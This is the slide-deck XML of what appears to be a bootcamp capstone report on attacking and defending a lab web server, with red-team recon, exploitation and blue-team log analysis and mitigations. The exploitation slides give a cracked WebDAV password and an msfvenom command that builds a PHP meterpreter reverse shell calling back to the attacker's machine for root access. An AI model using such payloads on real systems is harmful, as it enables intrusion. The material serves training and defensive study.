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Medium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Lobster"/>
      <p:regular r:id="rId41"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Roboto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74022C5-7C51-4F41-8976-D673177FE15C}">
  <a:tblStyle styleId="{674022C5-7C51-4F41-8976-D673177FE1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RobotoLight-regular.fntdata"/><Relationship Id="rId41" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/Lobster-regular.fntdata"/><Relationship Id="rId44" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/RobotoLight-italic.fntdata"/><Relationship Id="rId43" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/RobotoLight-bold.fntdata"/><Relationship Id="rId45" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/Robot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Medium-regular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italic.fntdata"/><Relationship Id="rId34" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/RobotoMedium-bold.fntdata"/><Relationship Id="rId37" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/Roboto-regular.fntdata"/><Relationship Id="rId36" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/RobotoMedium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f03d20b66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f03d20b66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9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8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1.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image46.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image37.png"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image4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51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2.png"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image50.png"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image4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53.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image57.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image61.png"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image60.png"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image5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62.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image70.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image81.png"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image69.png"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image85.png"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image7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68.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image67.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image75.png"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image71.png"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image78.png"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image7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73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7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83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Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image86.png"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image96.png"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image89.png"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image9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Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image94.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image92.png"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image100.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image99.png"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image95.png"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image98.png"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image9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7.png"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image10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2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spd="slow" p14:dur="34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9.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image111.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image110.png"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1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6.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image121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2.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1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0.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1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7.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image124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6.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image13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5.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image10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54"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="0" t="19198"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="-12300" y="0"/>
            <a:ext cx="92170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54"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="262050" y="10502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Capstone Engagement</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="3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Assessment, Analysis, </a:t>
            </a:r>
            <a:br>
              <a:rPr b="1" lang="en" sz="3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en" sz="3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and Hardening of a Vulnerable System</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="31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Report Prepared by</a:t>
            </a:r>
            <a:endParaRPr b="1" i="1"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Benny Mosley, Jared Alanis, Jhon Castrillon, Kevin Omana &amp; Marlen Bovadilla</a:t>
            </a:r>
            <a:endParaRPr i="1"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September 18, 2021 </a:t>
            </a:r>
            <a:endParaRPr i="1"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Exploitation: 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LFI Vulnerability &amp; Unauthorized file upload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30" name="Google Shape;1130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3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="5044575" y="718563"/>
            <a:ext cx="3785100" cy="1505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3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5044275" y="718597"/>
            <a:ext cx="37851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Achievements</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1200"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arabicPeriod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Delivered reverse payload file onto website (/webdav folder).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arabicPeriod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Using the multi/handler exploit I gained root access to the Capstone Server (target).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33" name="Google Shape;1133;p63"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="457275" y="2369475"/>
            <a:ext cx="8372400" cy="2547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457225" y="2369513"/>
            <a:ext cx="81759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5" name="Google Shape;1135;p63"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="80194" l="0" r="27108" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="582318" y="2619137"/>
            <a:ext cx="4476064" cy="5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63"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="10610" t="50000"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="582175" y="3179873"/>
            <a:ext cx="4503550" cy="14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63"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="456959" y="718575"/>
            <a:ext cx="3848400" cy="1505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3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457216" y="718610"/>
            <a:ext cx="38484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Tools &amp; Processes</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1200"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eorgia"/>
              <a:buAutoNum type="arabicPeriod"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Used msfvenom to create and upload reverse payload.   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="700">
                <a:latin typeface="Georgia"/>
                <a:ea typeface="Georgia"/>
                <a:cs typeface="Georgia"/>
                <a:sym typeface="Georgia"/>
              </a:rPr>
              <a:t>Command: msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.1.90 LPORT=4444 &gt; /root/hack.php</a:t>
            </a:r>
            <a:endParaRPr sz="700"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eorgia"/>
              <a:buAutoNum type="arabicPeriod"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Used meterpreter to gain backdoor access onto the target machine (Capstone Server).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9" name="Google Shape;1139;p63"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3772256" y="622253"/>
            <a:ext cx="533372" cy="533480"/>
            <a:chOff x="457200" y="1378813"/>
            <a:chExt cx="695400" cy="695450"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1140" name="Google Shape;114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1" name="Google Shape;114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2" name="Google Shape;1142;p63"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="8296306" y="622253"/>
            <a:ext cx="533372" cy="533480"/>
            <a:chOff x="457200" y="1378813"/>
            <a:chExt cx="695400" cy="695450"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1143" name="Google Shape;114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4" name="Google Shape;114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5" name="Google Shape;1145;p63"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId5">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="5243" l="0" r="35308" t="17980"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5044275" y="2515613"/>
            <a:ext cx="1819900" cy="2109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6" name="Google Shape;1146;p63"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="444906" y="2283003"/>
            <a:ext cx="533372" cy="533480"/>
            <a:chOff x="457200" y="1378813"/>
            <a:chExt cx="695400" cy="695450"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1147" name="Google Shape;114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8" name="Google Shape;114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9" name="Google Shape;1149;p63"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId6">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="52912" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6279725" y="2790600"/>
            <a:ext cx="2353389" cy="15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64"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="16247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64"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="274350" y="1163100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Blue Team </a:t>
            </a:r>
            <a:endParaRPr b="1" sz="4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Log Analysis and </a:t>
            </a:r>
            <a:br>
              <a:rPr b="1" lang="en" sz="3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en" sz="3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Attack Characterization</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="31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56" name="Google Shape;1156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Analysis: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Identifying the Port Scan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2" name="Google Shape;1162;p65"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="127500" y="780650"/>
            <a:ext cx="8889000" cy="3951300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="1D8BE6">
              <a:alpha val="14530"/>
            </a:srgbClr>
          </a:solidFill>
          <a:ln cap="flat" cmpd="sng" w="2857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3" name="Google Shape;11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29" y="920424"/>
            <a:ext cx="8688974" cy="1155541"/>
          </a:xfrm>
          <a:prstGeom prst="rect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4" name="Google Shape;116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24" y="2242449"/>
            <a:ext cx="2893875" cy="1018716"/>
          </a:xfrm>
          <a:prstGeom prst="rect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5" name="Google Shape;116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516" y="3391913"/>
            <a:ext cx="2893893" cy="1076325"/>
          </a:xfrm>
          <a:prstGeom prst="rect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6" name="Google Shape;1166;p65"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3554825" y="2242450"/>
            <a:ext cx="2512200" cy="2225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Port Scan Start Time:</a:t>
            </a:r>
            <a:endParaRPr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Char char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en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Sep 8, 2021 @ 02:15:50.005</a:t>
            </a:r>
            <a:endParaRPr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Packets Sent:</a:t>
            </a:r>
            <a:endParaRPr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Char char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en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 packet/request @ 8,777 req.</a:t>
            </a:r>
            <a:endParaRPr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Source IP:</a:t>
            </a:r>
            <a:endParaRPr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Char char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en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192.168.1.90</a:t>
            </a:r>
            <a:endParaRPr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“pulses” of high request counts, varying destination ports, and high request amounts within milliseconds would suggest a port scan.</a:t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67" name="Google Shape;1167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2450" y="2242450"/>
            <a:ext cx="2412045" cy="2225700"/>
          </a:xfrm>
          <a:prstGeom prst="rect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8" name="Google Shape;1168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1713" y="2242453"/>
            <a:ext cx="290805" cy="2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Analysis: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Finding the Request for the Hidden Directory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74" name="Google Shape;1174;p66"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="367350" y="778650"/>
            <a:ext cx="8409300" cy="3878400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="1D8BE6">
              <a:alpha val="14530"/>
            </a:srgbClr>
          </a:solidFill>
          <a:ln cap="flat" cmpd="sng" w="2857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5" name="Google Shape;11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425" y="945000"/>
            <a:ext cx="7405149" cy="2094450"/>
          </a:xfrm>
          <a:prstGeom prst="rect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6" name="Google Shape;1176;p66"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1541250" y="3132488"/>
            <a:ext cx="6061500" cy="1392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●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Time of Request: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○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Sep 8, 2021 @ 03:24:31.008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●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Two requests were made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●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file connect_to_corp_server was requested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○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instructions on how to connect to http://192.168.1.105/webdav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77" name="Google Shape;117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950" y="3662875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Analysis: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Uncovering the Brute Force Attack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83" name="Google Shape;1183;p67"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="90025" y="717950"/>
            <a:ext cx="8964000" cy="4016100"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="1D8BE6">
              <a:alpha val="14530"/>
            </a:srgbClr>
          </a:solidFill>
          <a:ln cap="flat" cmpd="sng" w="2857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[Insert Here]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a screenshot of Kibana logs depicting the brute force attack.  </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1184" name="Google Shape;1184;p67"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="810075" y="3562200"/>
            <a:ext cx="7977000" cy="971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●"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How many requests were made in the attack? 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○"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42,298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●"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How many requests had been made before the attacker discovered the password? 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○"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42,245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85" name="Google Shape;118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50" y="957825"/>
            <a:ext cx="8824351" cy="2378400"/>
          </a:xfrm>
          <a:prstGeom prst="rect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6" name="Google Shape;118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25" y="3882450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Analysis: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Finding the WebDAV Connection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92" name="Google Shape;1192;p68"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="367350" y="741300"/>
            <a:ext cx="8409300" cy="4027200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="1D8BE6">
              <a:alpha val="14530"/>
            </a:srgbClr>
          </a:solidFill>
          <a:ln cap="flat" cmpd="sng" w="2857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93" name="Google Shape;1193;p68"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1178725" y="3720600"/>
            <a:ext cx="7424700" cy="971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●"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How many requests were made to this directory?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○"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63 requests were made to access the /webdav directory.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●"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Which files were requested?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○"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The two files requested were passwd.dav &amp; hack.php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175" y="40408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50" y="794125"/>
            <a:ext cx="7019853" cy="1857375"/>
          </a:xfrm>
          <a:prstGeom prst="rect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6" name="Google Shape;1196;p68"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId5">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="55873" l="0" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="458350" y="2512949"/>
            <a:ext cx="6981825" cy="819625"/>
          </a:xfrm>
          <a:prstGeom prst="rect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7" name="Google Shape;1197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5975" y="1332962"/>
            <a:ext cx="2347350" cy="1422650"/>
          </a:xfrm>
          <a:prstGeom prst="rect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8" name="Google Shape;1198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350" y="3436738"/>
            <a:ext cx="3416204" cy="199480"/>
          </a:xfrm>
          <a:prstGeom prst="rect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9" name="Google Shape;1199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9250" y="3436738"/>
            <a:ext cx="3802890" cy="199480"/>
          </a:xfrm>
          <a:prstGeom prst="rect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  <a:t>Blue Team</a:t>
            </a:r>
            <a:endParaRPr b="1">
              <a:solidFill>
                <a:schemeClr val="accent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  <a:t>Proposed Alarms and </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="34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34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  <a:t>Mitigation Strategies</a:t>
            </a:r>
            <a:endParaRPr sz="3400">
              <a:solidFill>
                <a:schemeClr val="accent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07" name="Google Shape;1207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Mitigation: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Blocking the Port Scan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13" name="Google Shape;1213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kind of alarm can be set to detect future access to this directory?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Count the number of requested ports for each source IP with a threshold set to 10 ports in 0.005 seconds.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14" name="Google Shape;1214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What configurations can be set on the host to mitigate port scans?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Using the alarm: if the threshold is surpassed, reject additional packets from the source IP.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Mitigation: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Finding the Request for the Hidden Directory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0" name="Google Shape;1220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kind of alarm can be set to detect future access to this directory?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Detect 3 or more 401 HTTP responses to /secret_folder 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Detect </a:t>
            </a:r>
            <a:r>
              <a:rPr i="1" lang="en" sz="1400">
                <a:latin typeface="Georgia"/>
                <a:ea typeface="Georgia"/>
                <a:cs typeface="Georgia"/>
                <a:sym typeface="Georgia"/>
              </a:rPr>
              <a:t>any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foreign IPs trying to access the folder.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1" name="Google Shape;1221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configuration can be set on the host to control access?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Set up .htaccess to disable indexing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If set up properly, a “Forbidden” error should pop-up when trying to access /secret_folder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Remove any public information regarding the location of /secret_folder or how to access it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Mitigation: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Preventing Brute Force Attacks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7" name="Google Shape;1227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kind of alarm can be set to detect future access to this directory?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Detecting an abnormal amount of logs from user_agent.original: “Mozilla/4.0 (Hydra)” will prevent against brute force attacks using Hydra. Also monitoring logs with status: “Error” and http.response.status_code: 401. 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The alarms should activate after a threshold of 10 logs an hour has been reached.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8" name="Google Shape;1228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configurations can be set on the host to mitigate port scans?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The host can set a limited amount of failed login attempts before locking the account. Along with the activation of the alarm, the account should lock after 10 failed login attempts an hour. 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Table of Contents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 document contains the following sections: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26" name="Google Shape;1026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7" name="Google Shape;1027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8" name="Google Shape;102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9" name="Google Shape;102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" name="Google Shape;1030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1" name="Google Shape;1031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2" name="Google Shape;1032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" name="Google Shape;1033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4" name="Google Shape;1034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5" name="Google Shape;1035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" name="Google Shape;1036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7" name="Google Shape;1037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8" name="Google Shape;1038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9" name="Google Shape;1039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Network Topology</a:t>
            </a:r>
            <a:endParaRPr b="1"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0" name="Google Shape;1040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Red Team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Security Assessment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4" name="Google Shape;1044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Mitigation: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Detecting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the WebDAV Connection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34" name="Google Shape;1234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What kind of alarm can be set to detect future access to this directory? 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An alarm can be set to detect when there are many of the http.response.status_phrase : "unauthorized" and url.path : "/webdav" attempts found. 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What threshold would you set to activate this alarm? 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An alarm could be set after 2 detections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5" name="Google Shape;1235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What configuration can be set on the host to control access? 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A MFA (Multi-Factor Authentication) can be setup to gain access to the webdav path. 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Describe the solution. If possible, provide the required command line(s). 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You would need to use Google-Authenticator and this will allow you to setup the MFA. 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Mitigation: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Identifying Reverse Shell Uploads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41" name="Google Shape;1241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kind of alarm can be set to detect future access to this directory?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Detecting for method: “put” to the /webdav/ directory will alert when a file was uploaded to the system. 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The threshold to file uploads into the /webdav/ directory should be set to 1. File uploads should be unauthorized.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2" name="Google Shape;1242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configurations can be set on the host to mitigate port scans?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The host can deny permissions to all users when it comes to file uploads into the /webdav/ directory. Users should only have read and execute permissions.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Create a group that gives access to /webdav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Groupadd &lt;group_name&gt;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Give the owner RWE permissions and others RE.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Chmod -R 750 &lt;directory&gt;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Google Shape;124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75"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="366150" y="1617450"/>
            <a:ext cx="8411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The End</a:t>
            </a:r>
            <a:endParaRPr sz="112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575" y="0"/>
            <a:ext cx="9197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38" y="40898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Georgia"/>
                <a:ea typeface="Georgia"/>
                <a:cs typeface="Georgia"/>
                <a:sym typeface="Georgia"/>
              </a:rPr>
              <a:t>Network Topology </a:t>
            </a:r>
            <a:endParaRPr b="1" sz="4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267775" y="910475"/>
            <a:ext cx="6611700" cy="37569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56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Network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Address </a:t>
            </a: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Range: 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192.168.1.0/24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Netmask: 255.255.255.0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Gateway: 10.0.0.1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Machines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IPv4: 10.0.0.12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OS: Windows 10 Pro x64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Hostname: ML-RefVm-684427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IPv4: 192.168.1.90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OS: Kali GNU/Linux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Hostname: Kali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IPv4: 192.168.1.100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OS: Ubuntu 18.04.4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Hostname: ELK-Stack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IPv4: 192.168.1.105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OS: Ubuntu 18.04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Hostname: Capstone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91440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Network Topology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600" y="938388"/>
            <a:ext cx="3777550" cy="368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6241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 u="sng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Red Team</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="4000" u="sng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 u="sng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Security Assessment</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="3100" u="sng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Recon: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Describing the Target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Nmap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identified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the following hosts on the network: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075" name="Google Shape;1075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{674022C5-7C51-4F41-8976-D673177FE15C}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ML-REFVM-684427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192.168.1.1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RDP Hyper-v</a:t>
                      </a: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Host Machine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ELK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192.168.1.100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Network Monitoring Machine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Capstone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192.168.1.105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Target Machine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Kali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192.168.1.90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Attacking </a:t>
                      </a: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Machine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Vulnerability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Assessment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1" name="Google Shape;1081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 assessment uncovered the following critical vulnerabilities in the target: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082" name="Google Shape;1082;p60"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="207413" y="112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{674022C5-7C51-4F41-8976-D673177FE15C}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="2909725"/>
                <a:gridCol w="2909725"/>
                <a:gridCol w="2909725"/>
              </a:tblGrid>
              <a:tr h="39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Weak Username and Passwords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First Name, or similar info. can be easily cracked via phishing or social engineering.</a:t>
                      </a:r>
                      <a:endParaRPr sz="105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Using commonly used passwords and the lack of </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en" sz="105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password</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en" sz="105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complexity (Uppercase, Numbers &amp; Symbols/special </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en" sz="105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characters</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en" sz="105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).</a:t>
                      </a:r>
                      <a:endParaRPr sz="105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Ashton &amp; Ryan are very predictable and easy to discover usernames.    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Using names or easy </a:t>
                      </a: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phrases</a:t>
                      </a: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as passwords makes it easy and quick to gain access to a system.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Brute Force Vulnerability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brute force vulnerability allows an attacker to submit many password/username combinations until guessing correctly.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Allows attackers to gain unauthorized access to a system.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LFI Vulnerability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LFI vulnerabilities on websites allow an attacker to include malicious files that are later run</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en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by the site.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Allows attackers to gain and expose sensitive information. Can lead to remote code execution.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Unauthorized File Upload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Unauthorized File Upload can allow files to be uploaded to a server that could be malicious.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Attackers can get various files on the servers to upload viruses, XSS or gain access to Pii.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182875" marL="1828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Exploitation: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Weak Username &amp; Password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8" name="Google Shape;1088;p61"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="5044575" y="718563"/>
            <a:ext cx="3785100" cy="1505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61"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5044275" y="718597"/>
            <a:ext cx="37851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Achievements</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1200"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arabicPeriod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Cracked hashed password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AutoNum type="arabicPeriod"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Gained access to the </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1"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/webdav</a:t>
            </a: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using the username </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1"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Ryan </a:t>
            </a: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 cracked hashed password </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1"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linux4u</a:t>
            </a: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0" name="Google Shape;1090;p61"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="457275" y="2369475"/>
            <a:ext cx="8372400" cy="2547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 txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457225" y="2369513"/>
            <a:ext cx="81759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p61"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="456959" y="718575"/>
            <a:ext cx="3848400" cy="1505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457216" y="718610"/>
            <a:ext cx="38484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Tools &amp; Processes</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1200"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eorgia"/>
              <a:buAutoNum type="arabicPeriod"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Using Dirb we found </a:t>
            </a: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/webdav</a:t>
            </a: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 folder  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eorgia"/>
              <a:buAutoNum type="arabicPeriod"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(Which contained username, hashed password and instructions on how to access.)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eorgia"/>
              <a:buAutoNum type="arabicPeriod"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Used </a:t>
            </a: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Crackstation.net</a:t>
            </a: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 to crack password.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3772256" y="62225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8296306" y="62225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0" name="Google Shape;1100;p61"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="444906" y="2283003"/>
            <a:ext cx="533372" cy="533480"/>
            <a:chOff x="457200" y="1378813"/>
            <a:chExt cx="695400" cy="695450"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1101" name="Google Shape;110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2" name="Google Shape;1102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3" name="Google Shape;1103;p61"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="19766" l="0" r="14922" t="37291"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1543750" y="2490625"/>
            <a:ext cx="6056499" cy="10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61"/>
          <p:cNvPicPr preferRelativeResize="0"/>
